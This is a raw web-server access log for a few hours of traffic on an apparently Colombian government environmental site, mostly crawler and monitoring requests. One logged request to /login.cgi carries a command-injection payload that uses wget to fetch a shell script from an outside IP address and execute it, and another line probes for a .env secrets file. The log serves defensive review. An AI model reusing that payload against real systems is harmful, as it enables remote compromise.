201.245.192.253 - - [14/Oct/2023:01:39:21 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42851
114.119.156.56 - - [14/Oct/2023:01:39:42 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%2B2012/&sort=date&order=asc HTTP/1.1" 200 13903
66.249.66.20 - - [14/Oct/2023:01:40:41 -0500] "GET /Publicaciones/2023EE225772.pdf HTTP/1.1" 404 228
216.245.221.92 - - [14/Oct/2023:01:41:01 -0500] "HEAD / HTTP/1.1" 200 -
114.119.148.37 - - [14/Oct/2023:01:41:17 -0500] "GET /BLA/resoluciones/index.php?dir=Notificaciones/AUTOS%2B2020/ HTTP/1.1" 200 13944
172.22.2.4 - - [14/Oct/2023:01:39:43 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Oct/2023:01:40:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60531
114.119.165.136 - - [14/Oct/2023:01:42:33 -0500] "GET /BLA/resoluciones/index.php?dir=Notificaciones/RESOLUCIONES%2B0217/ HTTP/1.1" 200 13965
114.119.146.29 - - [14/Oct/2023:01:44:02 -0500] "GET /BLA/resoluciones/index.php?dir=Notificaciones/AUTOS%2B2021/&sort=date&order=asc HTTP/1.1" 200 13944
201.245.192.253 - - [14/Oct/2023:01:44:20 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42851
66.249.73.68 - - [14/Oct/2023:01:45:15 -0500] "GET /como-hacer-uso-de-la-publicidad-exterior-visual-en-epoca-electoral.html HTTP/1.1" 304 -
216.245.221.92 - - [14/Oct/2023:01:46:01 -0500] "HEAD / HTTP/1.1" 200 -
114.119.131.112 - - [14/Oct/2023:01:46:17 -0500] "GET /BLA/resoluciones/index.php?dir=Notificaciones/AUTOS%2B2018/ HTTP/1.1" 200 13944
114.119.150.41 - - [14/Oct/2023:01:46:48 -0500] "GET /BLA/resoluciones/index.php?dir=Notificaciones/AUTOS%2B2022/&sort=name&order=desc HTTP/1.1" 200 13943
172.22.2.4 - - [14/Oct/2023:01:45:33 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Oct/2023:01:46:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52532
114.119.128.10 - - [14/Oct/2023:01:48:08 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%2B2021/&sort=date&order=asc HTTP/1.1" 200 13882
52.167.144.234 - - [14/Oct/2023:01:48:24 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2428.pdf HTTP/1.1" 200 463970
201.245.192.253 - - [14/Oct/2023:01:49:19 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42851
114.119.159.145 - - [14/Oct/2023:01:49:29 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%2B2020/&sort=name&order=desc HTTP/1.1" 200 13881
114.119.152.139 - - [14/Oct/2023:01:50:55 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%2B2012/&sort=date&order=asc HTTP/1.1" 200 13882
216.245.221.92 - - [14/Oct/2023:01:51:01 -0500] "HEAD / HTTP/1.1" 200 -
113.207.1.133 - - [14/Oct/2023:01:51:02 -0500] "GET /galeria/galeria/fotos/Humedal-la-conejera2P.jpg HTTP/1.1" 200 31007
52.167.144.188 - - [14/Oct/2023:01:52:12 -0500] "GET /portaldeninos/que-es-cambio-climatico/ HTTP/1.1" 200 86727
114.119.135.172 - - [14/Oct/2023:01:52:27 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%2B2009/&sort=date&order=asc HTTP/1.1" 200 13882
172.22.2.4 - - [14/Oct/2023:01:51:23 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
52.167.144.188 - - [14/Oct/2023:01:53:16 -0500] "GET /portaldeninos/wp-content/themes/betheme/fonts/mfn-icons.ttf?93978679 HTTP/1.1" 200 124684
52.167.144.210 - - [14/Oct/2023:01:53:21 -0500] "GET /portaldeninos/wp-content/uploads/2020/01/Infograf%C3%ADa.gif%22%22 HTTP/1.1" 301 -
52.167.144.210 - - [14/Oct/2023:01:53:22 -0500] "GET /portaldeninos/wp-content/uploads/2020/01/Infograf%C3%ADa.gif HTTP/1.1" 200 965626
114.119.136.143 - - [14/Oct/2023:01:53:29 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%2B2007/&sort=name&order=asc HTTP/1.1" 200 13882
172.22.2.4 - - [14/Oct/2023:01:52:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57802
201.245.192.253 - - [14/Oct/2023:01:54:18 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42851
66.249.73.68 - - [14/Oct/2023:01:54:46 -0500] "GET /feria-de-emprendimiento-mujeres-que-reverdecen-expusieron-sus-proyectos.html HTTP/1.1" 304 -
114.119.151.175 - - [14/Oct/2023:01:54:55 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%2B2004/&sort=name&order=desc HTTP/1.1" 200 13881
216.245.221.92 - - [14/Oct/2023:01:56:01 -0500] "HEAD / HTTP/1.1" 200 -
114.119.138.117 - - [14/Oct/2023:01:58:43 -0500] "GET /BLA/resoluciones/index.php?dir=Notificaciones/DISCIPLINARIOS%2B2019/&sort=name&order=asc HTTP/1.1" 200 13971
172.22.2.4 - - [14/Oct/2023:01:57:13 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [14/Oct/2023:01:59:17 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42851
172.22.2.4 - - [14/Oct/2023:01:58:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58155
216.245.221.92 - - [14/Oct/2023:02:01:01 -0500] "HEAD / HTTP/1.1" 200 -
114.119.157.108 - - [14/Oct/2023:02:03:04 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%2B1997/&sort=name&order=desc HTTP/1.1" 200 13902
201.245.192.253 - - [14/Oct/2023:02:04:16 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42851
172.22.2.4 - - [14/Oct/2023:02:03:03 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Oct/2023:02:03:55 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52532
52.167.144.191 - - [14/Oct/2023:02:05:59 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2017%2F HTTP/1.1" 200 286831
216.245.221.92 - - [14/Oct/2023:02:06:01 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.235 - - [14/Oct/2023:02:06:26 -0500] "GET /Publicaciones/2023EE214578.pdf HTTP/1.1" 404 228
20.120.134.38 - - [14/Oct/2023:02:06:38 -0500] "GET /Publicaciones/2023EE214578.pdf HTTP/1.1" 404 228
172.22.2.4 - - [14/Oct/2023:02:07:03 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9682
66.249.73.68 - - [14/Oct/2023:02:07:45 -0500] "GET /como-hacer-uso-de-la-publicidad-exterior-visual-en-epoca-electoral.html HTTP/1.1" 304 -
172.22.2.4 - - [14/Oct/2023:02:06:16 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 62374
201.245.192.253 - - [14/Oct/2023:02:09:16 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42851
172.22.2.4 - - [14/Oct/2023:02:08:54 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [14/Oct/2023:02:11:01 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/Oct/2023:02:09:45 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57802
172.22.2.4 - - [14/Oct/2023:02:13:13 -0500] "GET /BLA/boletinlegal/Circulares/2010/Circular%2004%20de%2021%20de%20abril%20de%202010.pdf HTTP/1.1" 304 -
142.132.159.184 - - [14/Oct/2023:02:13:56 -0500] "GET /robots.txt HTTP/1.1" 404 1018
142.132.159.184 - - [14/Oct/2023:02:13:57 -0500] "GET /catalogoisis/ HTTP/1.1" 200 8575
201.245.192.253 - - [14/Oct/2023:02:14:14 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42851
142.132.159.184 - - [14/Oct/2023:02:13:58 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
216.245.221.92 - - [14/Oct/2023:02:16:01 -0500] "HEAD / HTTP/1.1" 200 -
124.225.164.130 - - [14/Oct/2023:02:16:07 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [14/Oct/2023:02:14:44 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Oct/2023:02:15:35 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60531
201.245.192.253 - - [14/Oct/2023:02:17:59 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42729
114.96.103.33 - - [14/Oct/2023:02:17:58 -0500] "GET /portaldeninos/ HTTP/1.1" 200 110179
201.245.192.253 - - [14/Oct/2023:02:18:01 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39491
201.245.192.253 - - [14/Oct/2023:02:19:14 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42851
114.119.134.231 - - [14/Oct/2023:02:20:22 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%2B2016/ HTTP/1.1" 200 13903
216.245.221.92 - - [14/Oct/2023:02:21:01 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/Oct/2023:02:20:34 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
114.119.165.226 - - [14/Oct/2023:02:22:14 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%2B2013/&sort=size&order=asc HTTP/1.1" 200 13903
66.249.66.19 - - [14/Oct/2023:02:21:05 -0500] "GET /BLA/boletinlegal/index.php? HTTP/1.1" 200 45933
66.249.66.20 - - [14/Oct/2023:02:22:50 -0500] "GET /BLA/boletinlegal/js/jquery.scrollTo-min.js HTTP/1.1" 200 1150
66.249.66.19 - - [14/Oct/2023:02:22:51 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
172.22.2.4 - - [14/Oct/2023:02:21:25 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 49492
114.119.155.205 - - [14/Oct/2023:02:23:20 -0500] "GET /BLA/resoluciones/index.php?dir=Notificaciones/RESOLUCIONES%2B2013/&sort=name&order=desc HTTP/1.1" 200 13964
162.55.171.94 - - [14/Oct/2023:02:23:29 -0500] "GET / HTTP/1.1" 200 4720
162.55.171.94 - - [14/Oct/2023:02:23:31 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [14/Oct/2023:02:24:12 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42851
114.119.134.48 - - [14/Oct/2023:02:24:38 -0500] "GET /BLA/resoluciones/index.php?dir=Notificaciones/RESOLUCIONES%2B2013/&sort=date&order=asc HTTP/1.1" 200 13965
40.77.167.43 - - [14/Oct/2023:02:26:01 -0500] "GET /galeria/galeria/fotos/juan-amarillo1G.jpg HTTP/1.1" 200 407260
216.245.221.92 - - [14/Oct/2023:02:26:01 -0500] "HEAD / HTTP/1.1" 200 -
114.119.134.67 - - [14/Oct/2023:02:26:24 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%2B2016/&sort=name&order=desc HTTP/1.1" 200 13881
114.119.136.14 - - [14/Oct/2023:02:27:37 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%2B2008/&sort=date&order=asc HTTP/1.1" 200 13903
201.245.192.253 - - [14/Oct/2023:02:27:59 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42729
201.245.192.253 - - [14/Oct/2023:02:28:02 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39491
172.22.2.4 - - [14/Oct/2023:02:26:24 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Oct/2023:02:27:15 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60531
201.245.192.253 - - [14/Oct/2023:02:29:12 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42851
47.254.74.59 - - [14/Oct/2023:02:29:47 -0500] "GET / HTTP/1.1" 200 319
47.254.74.59 - - [14/Oct/2023:02:29:47 -0500] "GET /Public/home/js/check.js HTTP/1.1" 404 1018
47.88.90.156 - - [14/Oct/2023:02:29:48 -0500] "GET /static/admin/javascript/hetong.js HTTP/1.1" 404 1018
66.249.73.69 - - [14/Oct/2023:02:30:15 -0500] "GET /conoce-las-medidas-de-prevencion-y-mitigacion-contempladas-en-la-alerta-fase-1-por-calidad-del-aire.html HTTP/1.1" 304 -
216.245.221.92 - - [14/Oct/2023:02:31:01 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/Oct/2023:02:32:14 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [14/Oct/2023:02:34:10 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42851
172.22.2.4 - - [14/Oct/2023:02:33:05 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58155
66.249.73.69 - - [14/Oct/2023:02:35:40 -0500] "GET /secretaria-de-ambiente-avanza-con-la-implementacion-de-viveros-y-sistemas-de-recoleccion-de-agua-lluvia-en-humedales.html HTTP/1.1" 304 -
216.245.221.92 - - [14/Oct/2023:02:36:01 -0500] "HEAD / HTTP/1.1" 200 -
34.232.23.139 - - [14/Oct/2023:02:36:51 -0500] "GET / HTTP/1.1" 200 319
34.232.23.139 - - [14/Oct/2023:02:36:51 -0500] "GET /favicon.ico HTTP/1.1" 304 -
201.245.192.253 - - [14/Oct/2023:02:37:59 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42729
201.245.192.253 - - [14/Oct/2023:02:38:02 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39491
201.245.192.253 - - [14/Oct/2023:02:39:09 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42851
156.146.62.139 - - [14/Oct/2023:02:39:28 -0500] "GET /login.cgi?cli=aa%20aa%27;wget%20http://80.91.223.136/reallynightmare.sh?dlink%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 406 -
172.22.2.4 - - [14/Oct/2023:02:38:04 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Oct/2023:02:38:55 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60531
216.245.221.92 - - [14/Oct/2023:02:41:01 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/Oct/2023:02:44:08 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42851
52.167.144.23 - - [14/Oct/2023:02:45:26 -0500] "GET /caminatas-ecologicas-un-plan-imperdible-para-octubre.html HTTP/1.1" 200 747
172.22.2.4 - - [14/Oct/2023:02:43:54 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [14/Oct/2023:02:46:01 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/Oct/2023:02:44:45 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58622
66.249.73.69 - - [14/Oct/2023:02:47:40 -0500] "GET /participa-en-la-convocatoria-para-el-aseguramiento-metrologico-de-la-red-de-monitoreo-de-calidad-del-aire-de-bogota.html HTTP/1.1" 200 848
138.68.191.197 - - [14/Oct/2023:02:47:55 -0500] "\x16\x03\x01\x01\xfd\x01" 400 226
66.249.73.69 - - [14/Oct/2023:02:48:14 -0500] "GET /camino-guadalupe-aguanoso-abierto-de-nuevo-al-publico.html HTTP/1.1" 304 -
201.245.192.253 - - [14/Oct/2023:02:49:07 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42851
216.245.221.92 - - [14/Oct/2023:02:51:01 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/Oct/2023:02:49:44 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Oct/2023:02:50:35 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57802
201.245.192.253 - - [14/Oct/2023:02:54:07 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42851
216.245.221.92 - - [14/Oct/2023:02:56:01 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/Oct/2023:02:55:34 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Oct/2023:02:56:25 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57802
201.245.192.253 - - [14/Oct/2023:02:59:06 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42851
216.245.221.92 - - [14/Oct/2023:03:01:01 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/Oct/2023:03:01:24 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Oct/2023:03:02:15 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60531
201.245.192.253 - - [14/Oct/2023:03:04:05 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42851
52.167.144.212 - - [14/Oct/2023:03:04:29 -0500] "GET /BLA/resoluciones/AUTOS%202023/2843.pdf HTTP/1.1" 200 412903
216.245.221.92 - - [14/Oct/2023:03:06:01 -0500] "HEAD / HTTP/1.1" 200 -
66.249.73.69 - - [14/Oct/2023:03:06:14 -0500] "GET /semana-ambiental-con-invitados-internacionales-secretaria-de-ambiente-realiza-medicion-de-particulas-en-vehiculos-euro-vi.html HTTP/1.1" 200 800
172.22.2.4 - - [14/Oct/2023:03:07:14 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [14/Oct/2023:03:09:03 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42851
172.22.2.4 - - [14/Oct/2023:03:08:05 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58155
52.167.144.189 - - [14/Oct/2023:03:10:51 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/0380.pdf HTTP/1.1" 200 259144
216.245.221.92 - - [14/Oct/2023:03:11:01 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.254 - - [14/Oct/2023:03:13:51 -0500] "GET /Publicaciones/2023EE237148.pdf HTTP/1.1" 200 480163
199.16.157.180 - - [14/Oct/2023:03:13:54 -0500] "GET /images/pl%C3%A1sticos%20foto%201..jpg HTTP/1.1" 404 1034
201.245.192.253 - - [14/Oct/2023:03:14:03 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42851
172.22.2.4 - - [14/Oct/2023:03:13:04 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Oct/2023:03:13:55 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60175
216.245.221.92 - - [14/Oct/2023:03:16:01 -0500] "HEAD / HTTP/1.1" 200 -
66.249.73.67 - - [14/Oct/2023:03:16:34 -0500] "GET /semana-bogoti-reverdece-bogoti-preparada-para-la-crisis-climitica.html HTTP/1.1" 304 -
201.245.192.253 - - [14/Oct/2023:03:17:58 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42730
201.245.192.253 - - [14/Oct/2023:03:18:00 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39495
201.245.192.253 - - [14/Oct/2023:03:19:02 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42851
36.85.35.38 - - [14/Oct/2023:03:19:51 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [14/Oct/2023:03:18:54 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [14/Oct/2023:03:21:01 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.19 - - [14/Oct/2023:03:21:06 -0500] "GET /BLA/resoluciones/AUTOS%202022/6320.pdf HTTP/1.1" 200 438829
172.22.2.4 - - [14/Oct/2023:03:19:45 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58155
199.16.157.181 - - [14/Oct/2023:03:22:16 -0500] "GET /images/liberacion-tinguas.jpg HTTP/1.1" 200 75984
40.77.167.68 - - [14/Oct/2023:03:23:45 -0500] "GET /BLA/resoluciones/AUTOS%202007/3531.pdf HTTP/1.1" 200 418120
201.245.192.253 - - [14/Oct/2023:03:24:01 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42851
66.249.73.69 - - [14/Oct/2023:03:24:14 -0500] "GET /agendate-para-participar-en-las-caminatas-ecologicas-de-febrero.html HTTP/1.1" 304 -
51.222.253.20 - - [14/Oct/2023:03:25:22 -0500] "GET /robots.txt HTTP/1.1" 404 1018
124.160.170.164 - - [14/Oct/2023:03:26:00 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [14/Oct/2023:03:26:01 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/Oct/2023:03:24:44 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
114.119.150.208 - - [14/Oct/2023:03:26:38 -0500] "GET /portalsiaccapacitaciones/Listas%20de%20Asistencia%202016/LISTA%20DE%20ASISTENCIA%2026%20DE%20MAYO.pdf HTTP/1.1" 200 1181031
172.22.2.4 - - [14/Oct/2023:03:25:35 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60175
201.245.192.253 - - [14/Oct/2023:03:27:58 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42730
114.119.155.122 - - [14/Oct/2023:03:28:01 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%2B1994/ HTTP/1.1" 200 13903
201.245.192.253 - - [14/Oct/2023:03:28:01 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39495
40.77.167.68 - - [14/Oct/2023:03:28:56 -0500] "GET /BLA/resoluciones/AUTOS%202007/0716.pdf HTTP/1.1" 200 110576
201.245.192.253 - - [14/Oct/2023:03:29:00 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42851
144.217.180.167 - - [14/Oct/2023:03:29:39 -0500] "GET /about.php?520 HTTP/1.1" 404 1035
144.217.180.167 - - [14/Oct/2023:03:29:42 -0500] "GET /about.php?520 HTTP/1.1" 404 1032
66.249.66.21 - - [14/Oct/2023:03:30:42 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1141.pdf HTTP/1.1" 200 855636
216.245.221.92 - - [14/Oct/2023:03:31:01 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/Oct/2023:03:30:34 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Oct/2023:03:31:25 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58155
201.245.192.253 - - [14/Oct/2023:03:33:59 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42851
40.77.167.254 - - [14/Oct/2023:03:34:46 -0500] "GET /BLA/resoluciones/AUTOS%202022/2884.pdf HTTP/1.1" 304 -
216.245.221.92 - - [14/Oct/2023:03:36:01 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/Oct/2023:03:37:58 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42730
201.245.192.253 - - [14/Oct/2023:03:38:01 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39495
172.22.2.4 - - [14/Oct/2023:03:36:24 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Oct/2023:03:37:15 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59813
201.245.192.253 - - [14/Oct/2023:03:38:57 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42851
216.245.221.92 - - [14/Oct/2023:03:41:01 -0500] "HEAD / HTTP/1.1" 200 -
66.249.73.68 - - [14/Oct/2023:03:42:14 -0500] "GET /semana-ambiental-2022-del-31-de-mayo-al-5-de-junio-se-celebrara-en-bogota.html HTTP/1.1" 304 -
52.167.144.192 - - [14/Oct/2023:03:42:35 -0500] "GET /Publicaciones/2023EE207825.pdf HTTP/1.1" 404 228
20.99.210.71 - - [14/Oct/2023:03:43:05 -0500] "GET /Publicaciones/2023EE207825.pdf HTTP/1.1" 404 228
172.22.2.4 - - [14/Oct/2023:03:42:14 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [14/Oct/2023:03:43:57 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42851
114.119.132.38 - - [14/Oct/2023:03:44:23 -0500] "GET /BLA/resoluciones/index.php?dir=Notificaciones/RESOLUCIONES%2B2012/&sort=size&order=asc HTTP/1.1" 200 13965
34.32.164.68 - - [14/Oct/2023:03:44:38 -0500] "GET /caminatas-ecologicas-un-plan-imperdible-para-octubre.html HTTP/1.1" 200 747
172.22.2.4 - - [14/Oct/2023:03:43:05 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60175
114.119.134.121 - - [14/Oct/2023:03:45:50 -0500] "GET /BLA/resoluciones/index.php?dir=Notificaciones/AUTOS%2B1985/ HTTP/1.1" 200 13944
216.245.221.92 - - [14/Oct/2023:03:46:01 -0500] "HEAD / HTTP/1.1" 200 -
20.15.133.163 - - [14/Oct/2023:03:47:54 -0500] "GET /Publicaciones/2023EE224011.pdf HTTP/1.1" 404 228
163.123.143.90 - - [14/Oct/2023:03:48:13 -0500] "GET /.env HTTP/1.1" 404 1018
163.123.143.90 - - [14/Oct/2023:03:48:14 -0500] "POST / HTTP/1.1" 200 319
201.245.192.253 - - [14/Oct/2023:03:48:56 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42851
172.22.2.4 - - [14/Oct/2023:03:48:04 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Oct/2023:03:48:55 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52532
216.245.221.92 - - [14/Oct/2023:03:51:01 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/Oct/2023:03:53:55 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42851
172.22.2.4 - - [14/Oct/2023:03:53:54 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [14/Oct/2023:03:56:01 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/Oct/2023:03:54:45 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58622
66.249.65.204 - - [14/Oct/2023:03:57:29 -0500] "GET /robots.txt HTTP/1.1" 404 1035
66.249.65.203 - - [14/Oct/2023:03:57:29 -0500] "GET /portaldeninos/parque-mirador-de-los-nevados/ HTTP/1.1" 200 89855
52.167.144.171 - - [14/Oct/2023:03:58:32 -0500] "GET /portaldeninos/parque-ecologico-distrital-humedal-santa-maria-del-lago/ HTTP/1.1" 200 90199
201.245.192.253 - - [14/Oct/2023:03:58:54 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42851
66.249.65.204 - - [14/Oct/2023:03:59:02 -0500] "GET /portaldeninos/wp-content/uploads/useanyfont/uaf.css?ver=1589905315 HTTP/1.1" 200 408
66.249.65.203 - - [14/Oct/2023:03:59:03 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/accordion.min.js?ver=1.11.4 HTTP/1.1" 200 8584
144.217.180.167 - - [14/Oct/2023:03:59:25 -0500] "GET /about.php?520 HTTP/1.1" 404 1035
144.217.180.167 - - [14/Oct/2023:03:59:26 -0500] "GET /about.php?520 HTTP/1.1" 404 1032
142.132.159.184 - - [14/Oct/2023:03:59:32 -0500] "GET /robots.txt HTTP/1.1" 404 1018
142.132.159.184 - - [14/Oct/2023:03:59:32 -0500] "GET /catalogoisis/ HTTP/1.1" 200 8575
66.249.73.68 - - [14/Oct/2023:04:00:14 -0500] "GET /mujeres-que-reverdecen-secretaria-de-ambiente-anuncia-el-inicio-de-la-tercera-fase.html HTTP/1.1" 200 954
216.245.221.92 - - [14/Oct/2023:04:01:01 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/Oct/2023:03:59:44 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Oct/2023:04:00:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60531
201.245.192.253 - - [14/Oct/2023:04:03:53 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42851
114.119.128.143 - - [14/Oct/2023:04:03:59 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%2BCONJUNTAS/ HTTP/1.1" 200 13918
114.119.159.6 - - [14/Oct/2023:04:05:31 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%2B2019/ HTTP/1.1" 200 13903
216.245.221.92 - - [14/Oct/2023:04:06:01 -0500] "HEAD / HTTP/1.1" 200 -
114.119.156.102 - - [14/Oct/2023:04:06:42 -0500] "GET /BLA/resoluciones/index.php?dir=Notificaciones/AUTOS%2B2202/&sort=size&order=asc HTTP/1.1" 200 13944
